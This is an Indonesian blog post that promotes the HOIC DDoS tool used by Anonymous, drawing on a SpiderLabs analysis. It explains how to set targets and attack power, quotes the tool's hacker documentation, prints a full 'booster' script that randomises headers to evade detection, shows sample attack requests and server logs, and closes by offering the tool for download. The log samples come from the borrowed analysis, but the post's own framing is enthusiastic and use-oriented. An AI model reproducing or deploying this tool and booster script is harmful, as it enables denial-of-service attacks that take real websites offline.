HOIC ddos from anonymous with analysis by SpiderLabs

HOIC ddos from anonymous with analysis by SpiderLabs admin kalo repost hapus aja yah

siapa yg gak tau anonymous buat anak anak cyber nah sekarang saya mau share tools HOIC
tools ini yg biasa di pake anak anak anonymous buat down sebuah website besar contohnya kemarin universal music dll



[Image: 6a0133f264aa62970b01676120d6b1970b-800wi]

HOIC Analysis

ini report dari SPIDERLABS yg telah menganalisis Tools DDOS ini

tools ini ber extensi executable windows dan tampilan yg sangat GUI sekali
[Image: 6a0133f264aa62970b0167612dc125970b-800wi]

jika kmu men klik tanda + di bawah tulisan TARGET maka kmu akan mendapatkan data spesifik target/korban


[Image: 6a0133f264aa62970b0167612e9611970b-800wi]

kemudian penyerang/kamu dapat menentukan data sasaran

Code:
URL - is the target website to attack
    Power -> sets the request velocity.  Initial testing shows the following:
        Low = ~2 requests/sec for eacch THREAD defined on the main GUI
        Mediem = ~4 requests/sec for each THREAD defined on the main GUI
        High - ~8 requests/sec for each THREAD defined on the main GUI
    Booster - are config scripts that define the dynamic request attributes

setelah kmu men klik tombol add maka beberapa saat akan kembali ke main screen

[Image: 6a0133f264aa62970b0167612ea130970b-pi]

nah setelah semuanya kamu dapat mengatur kekuatannya
dan klik tombol fire teh lazer ! dengan pengaturan default setting seperti yg di tunjukan di atas itu
CheerCheerCheerCheer
dan HTTP request nya sperti ini
Code:
GET / HTTP/1.0
Accept: */*
Accept-Language: en
Host: www.hoic_target_site.com

kalo target web server nya apache , contoh access_log entries akan terlihat sperti ini
Code:
72.192.214.223 - - [27/Jan/2012:08:57:59 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:57:59 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:03 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:03 -0600] "GET / HTTP/1.0" 200 21124

Kenapa HOIC berbeda dengan LOIC ?

mungkin kalian berpikir kenapa HOIC berbeda dngan LOIC
pertama - tama LOIC memiliki TCP dan UDP DDOS slain HTTP Ddos namun HOIC adalah tools pure untuk HTTP Ddos dan selain itu HOIC memiliki perangkat tambahan yaitu "Booster Scripts."

Booster script
ada pngn tau source nya ?
ini langsung di ambil dari HOIC DOCUMENTATION FOR HACKERS text file :
Code:
OK!

So BASICALLY

HOIC is pretty useless
UNLESS it is used incombination with "BOOSTERS", AKA "SCRIPTS"/BOOST PACKS / BOOM BOOM POWER
These boosters come in the form of .HOIC scripts.


hoic scripts are very simple and follow VB6 mixed with vb.net syntax although slightly altered
here are the functions and globals that relate the HOIC:

booster -> This is a global variable that contains the contents of the current script (string)
Headers -> This is a global variable that is an array of strings, and will be used to form headers in requests sent to the target URL.  To add a header, simply do something like this:
Headers.Append("User-Agent: penis") or Headers.Append("User-Agent: penis x" + CStr(powerFactor)

lbIndex -> Index into list box (cant really be used outside of the program, useless to developers)
PostBuffer -> String buffer containig post paramets, ie PostBuffer = "lol=2&lolxd=5"
powerFactor -> Integer from 0-2, 0 being low, 1 being medium , 2 being high
totalbytessent -> a count of the number of bytes sent to the target already (presistent across each attack)
URL -> url to attack
UsePost -> boolean, true = uses post, otherwise itll use get

agar lebih jelas oke kita lihat booster script yaitu GenericBoost.hoic:

Code:
Dim useragents() as String
Dim referers() as String
dim randheaders() as string

// EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!

// populate list
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)"
useragents.Append "Googlebot/2.1 ( http://www.googlebot.com/bot.html) "
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13"
useragents.Append "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"
useragents.Append "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
useragents.Append "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
useragents.Append "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"
useragents.Append "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
useragents.Append "Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53"

// populate referer list
referers.Append "http://www.google.com/?q="+URL
referers.Append URL
referers.Append "http://www.google.com/"
referers.Append "http://www.yahoo.com/"

// Add random headers
randheaders.Append "Cache-Control: no-cache"
randheaders.Append "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2007 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
randheaders.Append "If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT"
randheaders.Append "If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT"

// ------------------ DO NOT EDIT BELOW THIS LINE

// generate random referer
Headers.Append "Referer: " + referers(RndNumber(0, referers.UBound))
// generate random user agent (DO NOT MODIFY THIS LINE)
Headers.Append "User-Agent: " + useragents(RndNumber(0, useragents.UBound))
// Generate random headers
Headers.Append randheaders(RndNumber(0, randheaders.UBound))

bagaimana ?
aku sih gak ngerti MentokMentokMentokMentok

nah sekarang kita lihat contoh attack request nya CheerCheer

Example HOIC Attack Request #1
Code:
GET / HTTP/1.0
Accept: */*
Accept-Language: en
Referer: http://www.hoic_target_site.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)
If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT
Host: www.hoic_target_site.com

Example HOIC Attack Request #2
Code:
GET / HTTP/1.0
Accept: */*
Accept-Language: en
Referer: http://www.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT
Host: www.hoic_target_site.com

oke sampai di situ aja yah analisa nya Culas

oke klo yg mau coba tools nya ada nih
sedot

sumber : HN comunity

0 comments:

Post a Comment

 

Belajar Dan Berbagi Copyright © 2011-2012 | Powered by Blogger